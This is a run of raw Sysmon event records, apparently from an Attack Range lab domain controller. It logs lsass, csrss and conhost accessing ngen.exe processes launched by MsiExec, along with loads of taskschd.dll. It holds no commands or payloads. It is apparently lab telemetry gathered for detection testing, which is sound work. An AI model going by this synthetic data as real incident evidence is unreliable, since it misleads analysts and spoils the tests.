14:57:21.280{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-0E0C-00000000BB01}4248c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.280{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-0E0C-00000000BB01}4248c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.280{A7A01FEF-EBD1-607E-0E0C-00000000BB01}4248C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.265{A7A01FEF-EBD1-607E-0F0C-00000000BB01}51084444C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-0E0C-00000000BB01}4248c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.249{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-0F0C-00000000BB01}5108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.249{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-0E0C-00000000BB01}4248c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.249{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-0E0C-00000000BB01}4248c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-0C0C-00000000BB01}3516c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-0C0C-00000000BB01}3516c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.233{A7A01FEF-EBD1-607E-0C0C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.218{A7A01FEF-EBD1-607E-0D0C-00000000BB01}70842176C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-0C0C-00000000BB01}3516c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.218{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-0D0C-00000000BB01}7084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.202{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-0C0C-00000000BB01}3516c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.202{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-0C0C-00000000BB01}3516c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.202{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-0A0C-00000000BB01}4004c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.202{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-0A0C-00000000BB01}4004c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.202{A7A01FEF-EBD1-607E-0A0C-00000000BB01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.186{A7A01FEF-EBD1-607E-0B0C-00000000BB01}57966988C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-0A0C-00000000BB01}4004c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.171{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-0B0C-00000000BB01}5796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.171{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-0A0C-00000000BB01}4004c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.171{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-0A0C-00000000BB01}4004c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-080C-00000000BB01}3004c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-080C-00000000BB01}3004c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.155{A7A01FEF-EBD1-607E-080C-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.140{A7A01FEF-EBD1-607E-090C-00000000BB01}59205556C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-080C-00000000BB01}3004c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.140{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-090C-00000000BB01}5920C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.124{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-080C-00000000BB01}3004c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.124{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-080C-00000000BB01}3004c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.124{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-060C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.124{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-060C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.124{A7A01FEF-EBD1-607E-060C-00000000BB01}3640C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 